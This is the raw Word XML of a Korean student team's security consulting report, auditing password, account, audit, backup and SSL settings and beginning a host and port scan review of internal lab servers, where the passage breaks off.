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68" w:rsidRPr="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A6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65A68" w:rsidRDefault="00865A68" w:rsidP="00865A68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</w:pP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보안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 xml:space="preserve"> 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컨설팅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 xml:space="preserve"> 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프로젝트</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRPr="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68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40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3조 </w:t>
      </w:r>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>김동은,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>곽준희,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>유승호</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:ind w:right="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRPr="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:right="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00865A68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
      <w:r w:rsidRPr="00865A68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[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>컨설팅 회사 소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직 현황</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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사 소개 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1160" w:right="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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직 현황 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:ind w:left="1160" w:right="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:right="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00865A68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>보안 취약점 점검</w:t>
      </w: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보안 요구사항</w:t>
      </w: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취약점 점검 리스트</w:t>
      </w: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취약점 점검 일정</w:t>
      </w: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Pr="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782">
      <w:pPr>
        <w:ind w:right="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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점검 결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRPr="00CE3782" w:rsidRDefault="00865A68" w:rsidP="00CE3782">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:right="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>보안 점검</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRPr="00CE3782" w:rsidRDefault="00865A68" w:rsidP="00CE3782">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:right="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">계정 정책 </w:t>
      </w:r>
      <w:r w:rsidR="00CE3782" w:rsidRPr="00CE3782">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>암호 정책 및 계정 잠금 정책</w:t>
      </w:r>
      <w:r w:rsidR="00CE3782" w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:ind w:right="200" w:firstLine="800"/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034540" cy="624840"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="2" name="그림 2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A6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0760" cy="411480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="3" name="그림 3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68" w:rsidRDefault="00865A68" w:rsidP="00865A68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640</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2766060" cy="1021080"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="4" name="그림 4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1447800" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="그림 5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>윈도우</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버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우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복잡성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정책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억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기간</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 42</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>일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길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제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제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잠금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및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임계</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782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값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</w:p>
    <w:p w:rsidR="00865A68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우</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/pam.d/system-auth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복잡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재시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가능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횟수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최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길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본값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만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고</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782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일은</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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전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길이는</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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, /etc/default/userad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결과</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> INACTIVE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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값이</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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잠금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되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있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  <w:r w:rsidR="00865A68" w:rsidRPr="00CE3782">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRP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CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">계정 정책 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>계정 설정]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38400" cy="1135380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="6" name="그림 6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02180" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="7" name="그림 7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>윈도우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서버는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관리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및</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Guest </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>계정</w:t>
      </w:r>
      <w:r w:rsidR="00220989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명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그대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, Guest </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>계정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안</w:t>
      </w:r>
      <w:r w:rsidR="00220989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함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상태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원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접속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필요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별도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계정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하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etc/passw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CE3782" w:rsidRP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CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>감사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정책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/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>개체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액세스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및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이벤트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감사</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00EC4F0D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082A53" wp14:editId="4D4C859F">
            <wp:extent cx="2339340" cy="1760220"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="8" name="그림 8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782"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BBAEA30" wp14:editId="5CB7057C">
            <wp:extent cx="2575560" cy="1729740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="10" name="그림 10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0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>현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감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정책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L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inux</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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로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</w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsid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CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>백업 일정 설정 및 확인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1577340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="11" name="그림 11" descr="https://lh5.googleusercontent.com/uf20lk31lki7oCiDR42FA8KYldk6Cy_sT7MUB80iNg296FqAygoBAaAfTfwm7wNP9ezibTQhILPPR9Q1M6Y8i2eCxEQ318YeXRRkPDhL8Nz0e0E2RjHi-SZb7OIU8835e8DCko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uf20lk31lki7oCiDR42FA8KYldk6Cy_sT7MUB80iNg296FqAygoBAaAfTfwm7wNP9ezibTQhILPPR9Q1M6Y8i2eCxEQ318YeXRRkPDhL8Nz0e0E2RjHi-SZb7OIU8835e8DCko0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1562100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="그림 12" descr="https://lh6.googleusercontent.com/gXJ2qi3tm_hzl_aPIB97ZlyKxMYA9tgGlzSQVp1GYEJNy4brjSAVz4JK9j7i-fvbNQnVVyycXtTkx5hXcKpoECCL2EvbieQUpcw-mP6rICVOCHY5vfAVbkF6cCuxbYB6Evguk2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gXJ2qi3tm_hzl_aPIB97ZlyKxMYA9tgGlzSQVp1GYEJNy4brjSAVz4JK9j7i-fvbNQnVVyycXtTkx5hXcKpoECCL2EvbieQUpcw-mP6rICVOCHY5vfAVbkF6cCuxbYB6Evguk2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220989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220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>설정된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백업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일정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없음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsid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웹 서버 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SSL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>설정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69820" cy="586740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="13" name="그림 13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38400" cy="1379220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="그림 14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220989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220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>웹</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia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서버</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> https </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>접속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설정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확인</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>및</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia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 xml:space="preserve">http-&gt;https Redirect </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782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CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">시스템 보안 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782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CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ost Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782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1722120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="그림 15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3F605BD" wp14:editId="3046F46F">
            <wp:extent cx="2499360" cy="1699260"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="그림 16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9" w:rsidRDefault="00220989" w:rsidP="0022098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220989">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">eb, DNS[Primary], DHCP[Primary], DB, Game </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">서버가 있는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.100.0/24 </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>대역대</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>와 DNS[Secondary], DHCP[Secondary], VPN, CA</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">서버가 있는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.200.0/24 </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">대역대의 </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Host Scanning </w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">결과 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00220989" w:rsidRDefault="00220989" w:rsidP="00220989">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1164"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00220989" w:rsidRPr="00220989" w:rsidRDefault="00220989" w:rsidP="00220989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220989">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ort Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00220989" w:rsidP="00CE3782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53640" cy="1440180"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="17" name="그림 17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9" w:rsidRDefault="00220989" w:rsidP="0022098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szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">웹 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inux, 10.10.100.10]</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 대상으로 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fin Scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 시도했을 때의 결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRPr="004A79E9" w:rsidRDefault="004A79E9" w:rsidP="004A79E9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1164"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00220989" w:rsidRDefault="00220989" w:rsidP="00220989">
      <w:pPr>
        <w:ind w:left="804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DFE596" wp14:editId="7A77A8FF">
            <wp:extent cx="2362200" cy="1386840"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="19" name="그림 19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9" w:rsidRPr="0010076E" w:rsidRDefault="00220989" w:rsidP="0010076E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>V</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PN 서버</w:t>
      </w:r>
      <w:r w:rsidR="008F510A" w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[Window 2008 R2, 10.10.200.50</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="008F510A" w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 대상으로 </w:t>
      </w:r>
      <w:r w:rsidR="008F510A" w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fin Scanning</w:t>
      </w:r>
      <w:r w:rsidR="008F510A" w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 시도했을 때 방화벽이 있다면 </w:t>
      </w:r>
      <w:r w:rsidR="008F510A" w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Port Scanning</w:t>
      </w:r>
      <w:r w:rsidR="008F510A" w:rsidRPr="004A79E9">
        <w:rPr>
